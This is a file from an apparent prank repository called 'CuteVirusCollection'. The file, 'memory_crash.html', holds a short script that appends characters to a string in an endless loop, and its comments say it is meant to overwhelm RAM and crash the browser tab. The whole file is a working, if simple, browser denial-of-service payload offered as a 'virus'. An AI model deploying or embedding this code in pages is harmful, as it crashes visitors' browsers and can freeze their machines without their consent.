Files
CuteVirusCollection/memory_crash.html
2016-12-28 01:07:12 +06:00

10 lines
253 B
HTML

<!-- Intro- Creates a super big string and overwhelms the RAM. -->
<!-- Details- http://stackoverflow.com/questions/10965987/how-do-you-force-chrome-pages-tabs-to-crash-using-javascript -->
<script>
var txt = "a";
while(1){
txt += "a";
}
</script>